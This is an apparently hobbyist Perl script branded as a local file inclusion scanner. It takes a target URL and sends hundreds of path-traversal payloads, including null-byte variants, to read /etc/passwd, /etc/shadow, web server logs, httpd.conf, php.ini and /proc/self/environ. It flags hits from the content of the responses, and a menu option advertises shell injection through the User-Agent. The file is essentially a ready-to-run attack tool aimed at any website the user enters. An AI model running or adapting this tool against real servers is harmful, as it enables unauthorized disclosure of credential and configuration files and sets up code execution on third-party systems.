

    use HTTP::Request;
    use LWP::UserAgent;
system("LFI_SCANNER THE WARLOCK");
system("color 1e");
system ("cls");

print "\n\t\t#################################################";
print "\n\t\t#                                               #";
print "\n\t\t#             FILE INCLUSION SCANNER            #";
print "\n\t\t#                  BY WARLOCK                   #";
print "\n\t\t#                                               #";
print "\n\t\t#################################################";
sleep (1);
menu:;
print "\n[+]METHODS FOR LFI SCANNING...:\n";
print "\n[+]PRESS 1 FOR";
print "\tSCAN FILES OF /etc/ Directory\n";
print "\n[+]PRESS 2 FOR";
print "\tScan INJECT Shell BY U-AGENT\n";
print"\n";
print "\n[+]ENTER CHOICS :";
$menu = <>;
if ($menu =~ /1/){
        goto lfi;
        }
        if ($menu =~ /2/){
                goto env;
        }
        else {
                print"\n\n";
                print "[-]UNKNOWN COMMAND\n";
                goto menu;
        };


lfi:;
    print "[+]ENTER URL OR WEBSITE E.g: http://www.xyz.com/index.php?page=\n";
    print "[+}ENER URL OR WEBSITE :";
    $host=<STDIN>;
    chomp($host);
    if($host !~ /http:\/\//) { $host = "http://$host"; };

print "\n\n";
print "STARTING SCANNING...\n";
print "\n\n";
@lfi = ('../etc/passwd',
'../../etc/passwd',
'/etc/passwd',
'/etc/shadow',
'/etc/group',
'/etc/security/group',
'/etc/security/passwd',
'/etc/security/user',
'/etc/security/environ',
'/etc/security/limits',
'/usr/lib/security/mkuser.default',
'../../../etc/passwd',
'../../../../etc/passwd',
'../../../../../etc/passwd',
'../../../../../../etc/passwd',
'../../../../../../../etc/passwd',
'../../../../../../../../etc/passwd',
'../../../../../../../../../etc/passwd',
'../../../../../../../../../../etc/passwd',
'../../../../../../../../../../../etc/passwd',
'../../../../../../../../../../../../etc/passwd',
'../../../../../../../../../../../../../etc/passwd',
'../../../../../../../../../../../../../../etc/passwd',
'../../../../../../../../../../../../../../../../etc/passwd',
'....//etc/passwd',
'....//....//etc/passwd',
'....//....//....//etc/passwd',
'....//....//....//....//etc/passwd',
'....//....//....//....//....//etc/passwd',
'....//....//....//....//....//....//etc/passwd',
'....//....//....//....//....//....//....//etc/passwd',
'....//....//....//....//....//....//....//....//etc/passwd',
'....//....//....//....//....//....//....//....//....//etc/passwd',
'....//....//....//....//....//....//....//....//....//....//etc/passwd',
'../../etc/passwd%00',
'../../../etc/passwd%00',
'../../../../etc/passwd%00',
'../../../../../etc/passwd%00',
'../../../../../../etc/passwd%00',
'../../../../../../../etc/passwd%00',
'../../../../../../../../etc/passwd%00',
'../../../../../../../../../etc/passwd%00',
'../../../../../../../../../../etc/passwd%00',
'../../../../../../../../../../../etc/passwd%00',
'../../../../../../../../../../../../etc/passwd%00',
'../../../../../../../../../../../../../etc/passwd%00',
'../../../../../../../../../../../../../../etc/passwd%00',
'../../../../../../../../../../../../../../../../etc/passwd%00',
'....//etc/passwd%00',
'....//....//etc/passwd%00',
'....//....//....//etc/passwd%00',
'....//....//....//....//etc/passwd%00',
'....//....//....//....//....//etc/passwd%00',
'....//....//....//....//....//....//etc/passwd%00',
'....//....//....//....//....//....//....//etc/passwd%00',
'....//....//....//....//....//....//....//....//etc/passwd%00',
'....//....//....//....//....//....//....//....//....//etc/passwd%00',
'....//....//....//....//....//....//....//....//....//....//etc/passwd%00',
'../etc/shadow',
'../../etc/shadow',
'../../../etc/shadow',
'../../../../etc/shadow',
'../../../../../etc/shadow',
'../../../../../../etc/shadow',
'../../../../../../../etc/shadow',
'../../../../../../../../etc/shadow',
'../../../../../../../../../etc/shadow',
'../../../../../../../../../../etc/shadow',
'../../../../../../../../../../../etc/shadow',
'../../../../../../../../../../../../etc/shadow',
'../../../../../../../../../../../../../etc/shadow',
'../../../../../../../../../../../../../../etc/shadow',
'../etc/shadow%00',
'../../etc/shadow%00',
'../../../etc/shadow%00',
'../../../../etc/shadow%00',
'../../../../../etc/shadow%00',
'../../../../../../etc/shadow%00',
'../../../../../../../etc/shadow%00',
'../../../../../../../../etc/shadow%00',
'../../../../../../../../../etc/shadow%00',
'../../../../../../../../../../etc/shadow%00',
'../../../../../../../../../../../etc/shadow%00',
'../../../../../../../../../../../../etc/shadow%00',
'../../../../../../../../../../../../../etc/shadow%00',
'../../../../../../../../../../../../../../etc/shadow%00',
'../etc/group',
'../../etc/group',
'../../../etc/group',
'../../../../etc/group',
'../../../../../etc/group',
'../../../../../../etc/group',
'../../../../../../../etc/group',
'../../../../../../../../etc/group',
'../../../../../../../../../etc/group',
'../../../../../../../../../../etc/group',
'../../../../../../../../../../../etc/group',
'../../../../../../../../../../../../etc/group',
'../../../../../../../../../../../../../etc/group',
'../../../../../../../../../../../../../../etc/group',
'../etc/group%00',
'../../etc/group%00',
'../../../etc/group%00',
'../../../../etc/group%00',
'../../../../../etc/group%00',
'../../../../../../etc/group%00',
'../../../../../../../etc/group%00',
'../../../../../../../../etc/group%00',
'../../../../../../../../../etc/group%00',
'../../../../../../../../../../etc/group%00',
'../../../../../../../../../../../etc/group%00',
'../../../../../../../../../../../../etc/group%00',
'../../../../../../../../../../../../../etc/group%00',
'../../../../../../../../../../../../../../etc/group%00',
'../etc/security/group',
'../../etc/security/group',
'../../../etc/security/group',
'../../../../etc/security/group',
'../../../../../etc/security/group',
'../../../../../../etc/security/group',
'../../../../../../../etc/security/group',
'../../../../../../../../etc/security/group',
'../../../../../../../../../etc/security/group',
'../../../../../../../../../../etc/security/group',
'../../../../../../../../../../../etc/security/group',
'../etc/security/group%00',
'../../etc/security/group%00',
'../../../etc/security/group%00',
'../../../../etc/security/group%00',
'../../../../../etc/security/group%00',
'../../../../../../etc/security/group%00',
'../../../../../../../etc/security/group%00',
'../../../../../../../../etc/security/group%00',
'../../../../../../../../../etc/security/group%00',
'../../../../../../../../../../etc/security/group%00',
'../../../../../../../../../../../etc/security/group%00',
'../etc/security/passwd',
'../../etc/security/passwd',
'../../../etc/security/passwd',
'../../../../etc/security/passwd',
'../../../../../etc/security/passwd',
'../../../../../../etc/security/passwd',
'../../../../../../../etc/security/passwd',
'../../../../../../../../etc/security/passwd',
'../../../../../../../../../etc/security/passwd',
'../../../../../../../../../../etc/security/passwd',
'../../../../../../../../../../../etc/security/passwd',
'../../../../../../../../../../../../etc/security/passwd',
'../../../../../../../../../../../../../etc/security/passwd',
'../../../../../../../../../../../../../../etc/security/passwd',
'../etc/security/passwd%00',
'../../etc/security/passwd%00',
'../../../etc/security/passwd%00',
'../../../../etc/security/passwd%00',
'../../../../../etc/security/passwd%00',
'../../../../../../etc/security/passwd%00',
'../../../../../../../etc/security/passwd%00',
'../../../../../../../../etc/security/passwd%00',
'../../../../../../../../../etc/security/passwd%00',
'../../../../../../../../../../etc/security/passwd%00',
'../../../../../../../../../../../etc/security/passwd%00',
'../../../../../../../../../../../../etc/security/passwd%00',
'../../../../../../../../../../../../../etc/security/passwd%00',
'../../../../../../../../../../../../../../etc/security/passwd%00',
'../etc/security/user',
'../../etc/security/user',
'../../../etc/security/user',
'../../../../etc/security/user',
'../../../../../etc/security/user',
'../../../../../../etc/security/user',
'../../../../../../../etc/security/user',
'../../../../../../../../etc/security/user',
'../../../../../../../../../etc/security/user',
'../../../../../../../../../../etc/security/user',
'../../../../../../../../../../../etc/security/user',
'../../../../../../../../../../../../etc/security/user',
'../../../../../../../../../../../../../etc/security/user',
'../etc/security/user%00',
'../../etc/security/user%00',
'../../../etc/security/user%00',
'../../../../etc/security/user%00',
'../../../../../etc/security/user%00',
'../../../../../../etc/security/user%00',
'../../../../../../../etc/security/user%00',
'../../../../../../../../etc/security/user%00',
'../../../../../../../../../etc/security/user%00',
'../../../../../../../../../../etc/security/user%00',
'../../../../../../../../../../../etc/security/user%00',
'../../../../../../../../../../../../etc/security/user%00',
'../../../../../../../../../../../../var/log/httpd/access_log',
'../../../../../../../../../../../../var/log/httpd/error_log',
'../../../../../../../../../../var/log/httpd/access_log',
'../../../../../../../../../../var/log/httpd/error_log',
'../apache/logs/error.log',
'../apache/logs/access.log',
'../../apache/logs/error.log',
'../../apache/logs/access.log',
'../../../apache/logs/error.log',
'../../../apache/logs/access.log',
'../../../../apache/logs/error.log',
'../../../../apache/logs/access.log',
'../../../../../apache/logs/error.log',
'../../../../../apache/logs/access.log',
'../apache2/logs/error.log',
'../apache2/logs/access.log',
'\../../apache2/logs/error.log',
'../../apache2/logs/access.log',
'../../../apache2/logs/error.log',
'../../../apache2/logs/access.log',
'../../../../apache2/logs/error.log',
'../../../../apache2/logs/access.log',
'../../../../../apache2/logs/error.log',
'../../../../../apache2/logs/access.log',
'../logs/error.log',
'../logs/access.log',
'../../logs/error.log',
'../../logs/access.log',
'../../../logs/error.log',
'../../../logs/access.log',
'../../../../logs/error.log',
'../../../../logs/access.log',
'../../../../../logs/error.log',
'../../../../../logs/access.log',
'../../../../../../../../../../etc/httpd/logs/acces_log',
'../../../../../../../../../../etc/httpd/logs/acces.log',
'../../../../../../../../../../etc/httpd/logs/error_log',
'../../../../../../../../../../etc/httpd/logs/error.log',
'../../../../../../../../../../usr/local/apache/logs/access_log',
'../../../../../../../../../../usr/local/apache/logs/access.log',
'../../../../../../../../../../usr/local/apache/logs/error_log',
'../../../../../../../../../../usr/local/apache/logs/error.log',
'../../../../../../../../../../usr/local/apache2/logs/access_log',
'../../../../../../../../../../usr/local/apache2/logs/access.log',
'../../../../../../../../../../usr/local/apache2/logs/error_log',
'../../../../../../../../../../usr/local/apache2/logs/error.log',
'../../../../../../../../../../var/www/logs/access_log',
'../../../../../../../../../../var/www/logs/access.log',
'../../../../../../../../../../var/www/logs/error_log',
'../../../../../../../../../../var/www/logs/error.log',
'../../../../../../../../../../var/log/httpd/access_log',
'../../../../../../../../../../var/log/httpd/access.log',
'../../../../../../../../../../var/log/httpd/error_log',
'../../../../../../../../../../var/log/httpd/error.log',
'../../../../../../../../../../var/log/apache/access_log',
'../../../../../../../../../../var/log/apache/access.log',
'../../../../../../../../../../var/log/apache/error_log',
'../../../../../../../../../../var/log/apache/error.log',
'../../../../../../../../../../var/log/apache2/access_log',
'../../../../../../../../../../var/log/apache2/access.log',
'../../../../../../../../../../var/log/apache2/error_log',
'../../../../../../../../../../var/log/apache2/error.log',
'../../../../../../../../../../var/log/access_log',
'../../../../../../../../../../var/log/access.log',
'../../../../../../../../../../var/log/error_log',
'../../../../../../../../../../var/log/error.log',
'../../../../../../../../../../opt/lampp/logs/access_log',
'../../../../../../../../../../opt/lampp/logs/error_log',
'../../../../../../../../../../opt/xampp/logs/access_log',
'../../../../../../../../../../opt/xampp/logs/error_log',
'../../../../../../../../../../opt/lampp/logs/access.log',
'../../../../../../../../../../opt/lampp/logs/error.log',
'../../../../../../../../../../opt/xampp/logs/access.log',
'../../../../../../../../../../opt/xampp/logs/error.log',
'../../../../../../../../../../Program Files\Apache Group\Apache\logs\access.log',
'../../../../../../../../../../Program Files\Apache Group\Apache\logs\error.log',
'../../../apache/logs/error.log',
'../../../apache/logs/access.log',
'../../../../apache/logs/error.log',
'../../../../apache/logs/access.log',
'../../../../../apache/logs/error.log',
'../../../../../apache/logs/access.log',
'../../../../../../apache/logs/error.log',
'../../../../../../apache/logs/access.log',
'../../../../../../../apache/logs/error.log',
'../../../../../../../apache/logs/access.log',
'../../../../../../../../apache/logs/error.log',
'../../../../../../../../apache/logs/access.log',
'../../../logs/error.log',
'../../../logs/access.log',
'../../../../logs/error.log',
'../../../../logs/access.log',
'../../../../../logs/error.log',
'../../../../../logs/access.log',
'../../../../../../logs/error.log',
'../../../../../../logs/access.log',
'../../../../../../../logs/error.log',
'../../../../../../../logs/access.log',
'../../../../../../../../logs/error.log',
'../../../../../../../../logs/access.log',
'../../../../../../../../../../../../etc/httpd/logs/acces_log',
'../../../../../../../../../../../../etc/httpd/logs/acces.log',
'../../../../../../../../../../../../etc/httpd/logs/error_log',
'../../../../../../../../../../../../etc/httpd/logs/error.log',
'../../../../../../../../../../../../var/www/logs/access_log',
'../../../../../../../../../../../../var/www/logs/access.log',
'../../../../../../../../../../../../usr/local/apache/logs/access_log',
'../../../../../../../../../../../../usr/local/apache/logs/access.log',
'../../../../../../../../../../../../var/log/apache/access_log',
'../../../../../../../../../../../../var/log/apache/access.log',
'../../../../../../../../../../../../var/log/access_log',
'../../../../../../../../../../../../var/www/logs/error_log',
'../../../../../../../../../../../../var/www/logs/error.log',
'../../../../../../../../../../../../usr/local/apache/logs/error_log',
'../../../../../../../../../../../../usr/local/apache/logs/error.log',
'../../../../../../../../../../../../var/log/apache/error_log',
'../../../../../../../../../../../../var/log/apache/error.log',
'../../../../../../../../../../../../var/log/access_log',
'../../../../../../usr/local/apache/conf/httpd.conf',
'../../../../../../usr/local/apache2/conf/httpd.conf',
'../../../../../../etc/httpd/conf/httpd.conf',
'../../../../../../etc/apache/conf/httpd.conf',
'../../../../../../usr/local/etc/apache/conf/httpd.conf',
'../../../../../../etc/apache2/httpd.conf',
'../../../../../../../../../usr/local/apache/conf/httpd.conf',
'../../../../../../../../../usr/local/apache2/conf/httpd.conf',
'../../../../../../../../usr/local/apache/httpd.conf',
'../../../../../../../../usr/local/apache2/httpd.conf',
'../../../../../../../../usr/local/httpd/conf/httpd.conf',
'../../../../../../../usr/local/etc/apache/conf/httpd.conf',
'../../../../../../../usr/local/etc/apache2/conf/httpd.conf',
'../../../../../../../usr/local/etc/httpd/conf/httpd.conf',
'../../../../../../../usr/apache2/conf/httpd.conf',
'../../../../../../../usr/apache/conf/httpd.conf',
'../../../../../../../usr/local/apps/apache2/conf/httpd.conf',
'../../../../../../../usr/local/apps/apache/conf/httpd.conf',
'../../../../../../etc/apache/conf/httpd.conf',
'../../../../../../etc/apache2/conf/httpd.conf',
'../../../../../../etc/httpd/conf/httpd.conf',
'../../../../../../etc/http/conf/httpd.conf',
'../../../../../../etc/apache2/httpd.conf',
'../../../../../../etc/httpd/httpd.conf',
'../../../../../../etc/http/httpd.conf',
'../../../../../../etc/httpd.conf',
'../../../../../opt/apache/conf/httpd.conf',
'../../../../../opt/apache2/conf/httpd.conf',
'../../../../var/www/conf/httpd.conf',
'../../../private/etc/httpd/httpd.conf',
'../../../private/etc/httpd/httpd.conf.default',
'../../Volumes/webBackup/opt/apache2/conf/httpd.conf',
'../../Volumes/webBackup/private/etc/httpd/httpd.conf',
'../../Volumes/webBackup/private/etc/httpd/httpd.conf.default',
'../../../../../../../../../Program Files\Apache Group\Apache\conf\httpd.conf',
'../../../../../../../../../Program Files\Apache Group\Apache2\conf\httpd.conf',
'../../../../../../../../../Program Files\xampp\apache\conf\httpd.conf',
'../../../../../../../../../usr/local/php/httpd.conf.php',
'../../../../../../../../../usr/local/php4/httpd.conf.php',
'../../../../../../../../../usr/local/php5/httpd.conf.php',
'../../../../../../../../../usr/local/php/httpd.conf',
'../../../../../../../../../usr/local/php4/httpd.conf',
'../../../../../../../../../usr/local/php5/httpd.conf',
'../../../../../../../../../Volumes/Macintosh_HD1/opt/httpd/conf/httpd.conf',
'../../../../../../../../../etc/php.ini',
'../../../../../../../../../bin/php.ini',
'../../../../../../../../../etc/httpd/php.ini',
'../../../../../../../../../usr/lib/php.ini',
'../../../../../../../../../usr/lib/php/php.ini',
'../../../../../../../../../usr/local/etc/php.ini',
'../../../../../../../../../usr/local/lib/php.ini',
'../../../../../../../../../usr/local/php/lib/php.ini',
'../../../../../../../../../usr/local/php4/lib/php.ini',
'../../../../../../../../../usr/local/php5/lib/php.ini',
'../../../../../../../../../usr/local/apache/conf/php.ini',
'../../../../../../../../../etc/php4.4/fcgi/php.ini',
'../../../../../../../../../etc/php4/apache/php.ini',
'../../../../../../../../../etc/php4/apache2/php.ini',
'../../../../../../../../../etc/php5/apache/php.ini',
'../../../../../../../../../etc/php5/apache2/php.ini',
'../../../../../../../../../etc/php/php.ini',
'../../../../../../../../../etc/php/php4/php.ini',
'../../../../../../../../../etc/php/apache/php.ini',
'../../../../../../../../../etc/php/apache2/php.ini',
'../../../../../../../../../web/conf/php.ini',
'../../../../../../../../../usr/local/Zend/etc/php.ini',
'../../../../../../../../../opt/xampp/etc/php.ini',
'../../../../../../../../../var/local/www/conf/php.ini',
'../../../../../../../../../etc/php/cgi/php.ini',
'../../../../../../../../../etc/php4/cgi/php.ini',
'../../../../../../../../../etc/php5/cgi/php.ini',
'../../../../../../../../../php5\php.ini',
'../../../../../../../../../php4\php.ini',
'../../../../../../../../../php\php.ini',
'../../../../../../../../../PHP\php.ini',
'../../../../../../../../../WINDOWS\php.ini',
'../../../../../../../../../WINNT\php.ini',
'../../../../../../../../../apache\php\php.ini',
'../../../../../../../../../xampp\apache\bin\php.ini',
'../../../../../../../../../NetServer\bin\stable\apache\php.ini',
'../../../../../../../../../../../../../etc/security/user%00');


foreach $scan(@lfi){

$url = $host.$scan;
$request = HTTP::Request->new(GET=>$url);
$useragent = LWP::UserAgent->new();
$response = $useragent->request($request);
if ($response->is_success && $response->content =~ /root:x:/) { $msg = "[+]INFETCTED";}
else { $msg = "[-]NOT INFECTED";}
print "$scan..........[$msg]\n";
}
env:;
    print "[+]ENTER URL OR WEBSITE E.g.: http://www.xyz.com/index.php?page=\n";
    print "[+]ENTER URL OR WEBSITE :";
    $host=<STDIN>;
    chomp($host);
    if($host !~ /http:\/\//) { $host = "http://$host"; };

print "\n\n";
print "[+]STARTING SCANNING...\n";
print "\n\n";

@env = ('../proc/self/environ',
'../../proc/self/environ',
'../../../proc/self/environ',
'../../../../proc/self/environ',

'../../../../../proc/self/environ',
'../../../../../../proc/self/environ',
'../../../../../../../proc/self/environ',
'../../../../../../../../proc/self/environ',
'../../../../../../../../../proc/self/environ',
'../../../../../../../../../../proc/self/environ',
'../../../../../../../../../../../proc/self/environ',
'../../../../../../../../../../../../proc/self/environ',
'../../../../../../../../../../../../../proc/self/environ',
'../../../../../../../../../../../../../../proc/self/environ',
'../proc/self/environ%00',
'../../proc/self/environ%00',
'../../../proc/self/environ%00',
'../../../../proc/self/environ%00',
'../../../../../proc/self/environ%00',
'../../../../../../proc/self/environ%00',
'../../../../../../../proc/self/environ%00',
'../../../../../../../../proc/self/environ%00',
'../../../../../../../../../proc/self/environ%00',
'../../../../../../../../../../proc/self/environ%00',
'../../../../../../../../../../../proc/self/environ%00',
'../../../../../../../../../../../../proc/self/environ%00',
'../../../../../../../../../../../../../proc/self/environ%00',
'../../../../../../../../../../../../../../proc/self/environ%00');

foreach $scan_env(@env){

$url = $host.$scan_env;
$request = HTTP::Request->new(GET=>$url);
$useragent = LWP::UserAgent->new();
$response = $useragent->request($request);
if ($response->is_success && $response->content =~ /HTTP_ACCEPT/ && $response->content =~ /HTTP_HOST/) { $msg = "[+]INFETCTED";}
else { $msg = "[-]NOT INFECTED";}
print "$scan_env..........[$msg]\n";
}

